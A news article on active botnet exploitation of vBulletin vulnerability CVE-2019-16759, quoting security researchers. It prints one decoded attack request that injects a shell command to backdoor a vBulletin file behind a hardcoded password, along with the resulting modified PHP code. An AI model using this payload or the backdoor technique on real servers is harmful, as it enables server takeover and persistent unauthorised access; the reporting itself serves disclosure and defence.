High-severity vulnerability in vBulletin is being actively exploited

Attackers are mass-exploiting an anonymously disclosed vulnerability that makes it possible to take control of servers running vBulletin, one of the Internet’s most popular applications for website comments. Sites running the app should take comments offline until administrators install a patch that vBulletin developers released late Wednesday morning.

The vulnerability was disclosed through an 18-line exploit that was published on Monday by an unidentified person. The exploit allows unauthenticated attackers to remotely execute malicious code on just about any vBulletin server running versions 5.0.0 up to 5.5.4. The vulnerability is so severe and easy to exploit that some critics have described it as a back door.

“Essentially, any attack exploits a super simple command injection,” Ryan Seguin, a research engineer at Tenable, told Ars. “An attacker sends the payload, vBulletin then runs the command, and it responds back to the attacker with whatever they asked for. If an attacker issues a shell command as part of the injection, vBulletin will run Linux commands on its host with whatever user permissions vBulletins' system-level user account has access to.” Seguin has more in this technical analysis of the vulnerability.

According to researcher Troy Mursch of the Bad Packets security intelligence service, attackers are using botnets to actively exploit vulnerable servers. After decoding, some of the Web requests they send look like this:

"widgetConfig[code]=echo shell_exec('sed -i \'s/eval(\$code);/if (isset(\$_REQUEST[\"epass\"]) \&\& \$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\$code); }/g\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;"

Prior to the malicious Web request, code in a section of vBulletin called

includes/vb5/frontend/controller/bbcode.php

looked like this:

function evalCode($code)
{
    ob_start();
    eval($code);
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

After the Web request has been sent, the same section is changed to this:

function evalCode($code)
{
    ob_start();
    if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code); }
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

Mursch told Ars:

The exploit above modifies

includes/vb5/frontend/controller/bbcode.php

via the "sed" command to add a backdoor to the code. This is done by setting a “password” (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function if 2dmfrb28nu3c6s9j is set in future requests sent to the server. This would allow a botnet command-and-control (C2) server to exclusively exploit CVE-2019-16759 and issue commands to the targeted site.

The vulnerability itself has been regarded by some as a backdoor. This exploit attempt basically backdoors sites via a backdoor. As for why threat actors are doing this, it's likely to build an inventory of bots while they figure additional ways to exploit the compromised hosts – such as infecting them with DDoS malware and conducting denial-of-service attacks.

Some of the infected computers carrying out the attacks have been spotted in the past using the EternalBlue exploit, developed by and later stolen from the National Security Agency, to compromise computers that have yet to install a patch Microsoft released in early 2017.

Some vBulletin users took to the software’s official support pages on Wednesday to report they had been hacked. “I received an email today from my hosting provider stating that ‘malicious code was detected on your website and a huge number of email spam messages originating from it,’” one user wrote here (free account required). Another user reported having an entire MySQL database deleted.

vBulletin is among the most widely used website commenting systems and is probably used on tens of thousands—possibly hundreds of thousands—of sites. Fortunately, version 5x makes up less than 7% of active installations, according to W3techs, a site that surveys the software used across the Internet. Still, Internet searches like this one suggest that 10,000 or more sites may be running vulnerable versions.

Exploit available for years

According to Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, the vulnerability has been privately circulating for years.

The recent vBulletin pre-auth RCE 0day disclosed by a researcher on full-disclosure looks like a bugdoor, a perfect candidate for @PwnieAwards 2020. Easy to spot and exploit.

Many researchers were selling this exploit for years. @Zerodium customers were aware of it since 3 years

— Chaouki Bekrar (@cBekrar) September 25, 2019

“Many researchers were selling this exploit for years,” he wrote on Twitter. “Zerodium customers were aware of it since 3 years.”

The availability of a working exploit is aggravated by another publicly posted script that uses the Shodan search site to find vulnerable servers. Attackers can use it to generate a list of vBulletin sites that are susceptible and then use the exploit to take them over.

The vulnerability—which is tracked as CVE-2019-16759—exists in default installations of the affected versions. According to Tenable’s publicly posted analysis, “an unauthenticated attacker can send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host.”